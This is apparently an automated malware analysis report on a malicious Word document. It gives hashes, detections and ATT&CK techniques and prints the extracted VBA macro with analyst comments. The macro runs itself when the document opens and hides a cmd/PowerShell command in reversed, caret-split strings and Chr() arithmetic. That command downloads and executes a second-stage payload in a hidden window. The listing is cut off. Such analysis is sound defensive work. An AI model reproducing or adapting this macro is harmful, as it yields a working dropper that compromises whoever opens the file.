Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5fd8aa870702becb…

MALICIOUS

Office (OLE)

63.5 KB Created: 2018-09-07 07:42:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: fcc32139840e34c1dc9fc3759262c73e SHA-1: 1b215e5a013667b9b1cefdb56a30fc93fed790a6 SHA-256: 5fd8aa870702becb2c472968b66a87227d2457f59ea13f339ea01daae5736b62
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

This Office document contains VBA macros, including a Document_Open macro that calls the Shell() function. The script is obfuscated, but its apparent intent is to download and execute a second-stage payload. The ClamAV detection name 'Doc.Trojan.Agent-6922859-0' further corroborates the malicious verdict.

Heuristics 5

  • ClamAV: Doc.Trojan.Agent-6922859-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Agent-6922859-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4783 bytes
SHA-256: 27738129b68d89ba5372ddff14ee59c53b1089912cdd7084a66773865a6fcfaf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "arLYMdDLmZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word executes Document_open when the document is opened
' (ATT&CK T1204.002 user execution -> T1059.005 Visual Basic). This is the
' OLE_VBA_DOCOPEN / OLE_VBA_SHELL finding in the report above.
Private Sub Document_open()
' "On Error Resume Next" split across line continuations. It silences every
' runtime error in this Sub, so the junk statements below fail quietly instead
' of aborting the macro before the Shell call is reached.
On _
Error _
Resume _
Next
   ' Junk statements: Month() applied to concatenated random strings. The
   ' results are discarded (and Month() of a non-date string raises an error
   ' that the handler above swallows); they only pad the code and vary its
   ' bytes so that simple content signatures do not match.
   Month Format("uU" + "kzd")
   Month Format("LlzVBGiFY" + "ISE" + "1163" + "jmR")
   Month Format("14050696" + "uEAnTljwL")
   Month Format("alcqW" + "wJYf" + "tYGKfJdTssqcK" + "nlKrnhPzTGX")
   Month Format("501120407" + "8096")
   Month Format("1975" + "tJ")
' The single operative statement. The command line is assembled from the
' return values of omzVXopfMvA and qbwGjNv (module zidFqDEG below) plus five
' names (zQoczKWl, tvWOsTLnuTOj, GlLBQXf, jcvzWsAJ, bSYLRobSAm) that are never
' assigned in the visible listing — presumably empty Variants whose Format()
' is "", i.e. more padding; confirm against the full module. The second
' argument, vbHide, runs the spawned process with no visible window.
Shell Format(zQoczKWl) + Format(tvWOsTLnuTOj) + Format(GlLBQXf) + omzVXopfMvA + qbwGjNv + Format(jcvzWsAJ) + Format(bSYLRobSAm), Format(vbHide)
   Month Format("zVV" + "350569193")
End Sub



Attribute VB_Name = "zidFqDEG"
' Builds and returns the first part of the command line that Document_open
' hands to Shell. The return value is the concatenation of nine string
' fragments (see the assignment to omzVXopfMvA near the end); everything else
' in the body is padding. Note for analysts: the fragments are littered with
' "^" (the cmd.exe escape character, which cmd strips before execution) and
' several read as reversed text (e.g. nlObmzNfC ends in "t//^:p^t^t^h"), so
' the real command only appears after reversal and caret removal. Recover the
' embedded URL that way in a sandbox and record it as the download IoC; it is
' deliberately not spelled out here.
Function omzVXopfMvA()

' Suppresses the errors thrown by the junk Month() calls below.
On _
Error _
Resume _
Next
Month Format("Jv" + "TSkqZ" + "mHPdmGrmb" + "422056978")
   Month Format("253972228" + "483745372")
   Month Format("mw" + "T" + "NVZcwY" + "D")
   Month Format("5866" + "pX")
' Chr() of summed constants hides single characters from string scanners:
'   Chr(2 + 14 + 1 + 17 + 65) = Chr(99) = "c"
'   Chr(1 + 10 + 0 + 12 + 44) = Chr(67) = "C"
'   Chr(0 + 4 + 0 + 5 + 25)   = Chr(34) = '"'
' With those substituted, this fragment begins a cmd.exe invocation
' ("cmd /V^:^ON/C^" ... "^s^e^t ...") — /V:ON enables delayed variable
' expansion, which the rest of the command line relies on.
NSzisMl = Chr(2 + 14 + 1 + 17 + 65) + "md /V^" + ":^ON/" + Chr(1 + 10 + 0 + 12 + 44) + Chr(0 + 4 + 0 + 5 + 25) + "^s^e^t " + "T^B" + Chr(2 + 14 + 1 + 17 + 65) + "^O=^" + "  ^ ^ " + " "
Month Format("cqjO" + "dULpwAFPR")
   Month Format("NALwjK" + "YtVc" + "c" + "TjX")
   Month Format("7502" + "NhXihVtzj")
' Fragments 2-9: reversed, caret-obfuscated script text. Each is a plain
' string assignment; only their order in the final concatenation matters.
iYznuta = "^  ^ ^ " + "  ^  ^ " + " ^  " + "}" + "}" + "^{^h" + Chr(2 + 14 + 1 + 17 + 65) + "t^" + "a" + Chr(2 + 14 + 1 + 17 + 65) + "}^" + ";k^aer^" + "b^;" + "jQW^$ m" + "^e^t^I"
Month Format("zKUJ" + "P" + "8390" + "ccR")
   Month Format("279268119" + "ULTDXlkl" + "n" + "RNO")
   Month Format("OKcZMvH" + "M" + "INknfzXt" + "94463258")
jRkQlhT = "-^e^k^o" + "vnI" + ";)jQW$" + " ,K^z^" + "q$(^e" + "l^i^F" + "d^ao^" + "ln"
Month Format("tZ" + "7489")
   Month Format("113210660" + "402018979" + "101" + "tvJG")
   Month Format("bmJjP" + "wCw" + "4839" + "150037450")
   Month Format("393803886" + "TLiDilDpS" + "379871918" + "wMiau")
vwCVvu = "^w" + "^o" + "^D^.^" + "PnG^$^" + "{yrt{)" + "^"
Month Format("VFrZ" + "WO" + "EmWmATj" + "or")
   Month Format("2628" + "hjwQBYqRhhTbzK" + "464048509" + "jamFouci")
   Month Format("168335745" + "A" + "OW" + "VH")
   Month Format("ZPNFNnYXMRWw" + "3043")
jCwVEtQq = "EB" + "^O^$" + "^ ni^ " + "^Kzq$(h" + Chr(2 + 14 + 1 + 17 + 65) + "^aer^" + "of" + "^;'ex^"
Month Format("348732138" + "QqVAzOWaXGXVz" + "443206469" + "sAGJ")
ZJkbj = "e^.^'^+" + "In" + "n" + "$^+'" + "\'^" + "+" + Chr(2 + 14 + 1 + 17 + 65) + "^" + "i" + "^l^bu" + "^p^:vn^" + "e$" + "=j^QW" + "$;^'"
Month Format("t" + "nwiCDEE")
sKtbBOVfV = "^0^4^'" + " " + "=^ ^" + "Inn^$;)" + "^'^" + "@'" + "(^t^i" + "^lp^S.^" + "'nk^" + "t.^3^k" + "n^b^k" + "^=" + "^l^?^p"
Month Format("uWUSrrXDh" + "Q")
   Month Format("IHzwhiEEZnULFn" + "855")
' Likely the reversed, caret-split host/path of the payload URL — decode and
' verify in a sandbox rather than trusting a manual reading.
iirAQivjXVr = "^h^" + "p^.t^o^" + "ksn" + "a^po/^" + "T^TR/^" + "m" + "^o" + Chr(2 + 14 + 1 + 17 + 65) + ".m" + "6hs^h" + "q" + "p8^3ma^"
Month Format("4234" + "SEwXqo" + "DYbBWcFS" + "tvtHJhjG")
nlObmzNfC = "kf" + "t//^:p" + "^t" + "^t^" + "h'" + "^=E^" + "BO^$" + "^;^" + "t"
' VBA return convention: assigning to the function name sets the result.
' Fragment order here is the order they appear in the emitted command line.
omzVXopfMvA = NSzisMl + iYznuta + jRkQlhT + vwCVvu + jCwVEtQq + ZJkbj + sKtbBOVfV + iirAQivjXVr + nlObmzNfC
   Month Format("hz" + "20112209" + "305477354" + "Crzs")
   Month Format("wOf" + "sl" + "331311819" + "U")
End Function
Function qbwGjNv()

On _
Error _
Resume _
Next
Month Format("7827" + "kC" + "3781" + "LwXF")
   Month Format("133721618" + "nqm" + "456421768" + "R")
   Month Format("RkGIV" + "MLkX" + "QZFzpsKJ" + "2499")
uSjLBABM = "n" + "e^i" + "l" + Chr(1 + 10 + 0 + 12 + 44) + "be^W." + "^teN" + " ^t" + Chr(2 + 14 + 1 + 17 + 65) + "ejb^o^" + "-" + "^we" + "n=" + "^P" + "n^G$"
Month Format("ZZsjrWRXQFBFi" + "236509146" + "jr" + "hrzXuG")
   Month Format("j" + "i")
   Month Format("9081" + "8901")
jQbjRtr = "^ lleh" + "sr^ew^" + "op&&for" + " /^" + "L %V ^" + "in (^2^" + "63" + "^;" + "-"
Month Format("fAK" + "2447")
   Month Format("442812728" + "2191")
   Month Format("277144729" + "aHzRiFjDK")
   Month F
... (truncated)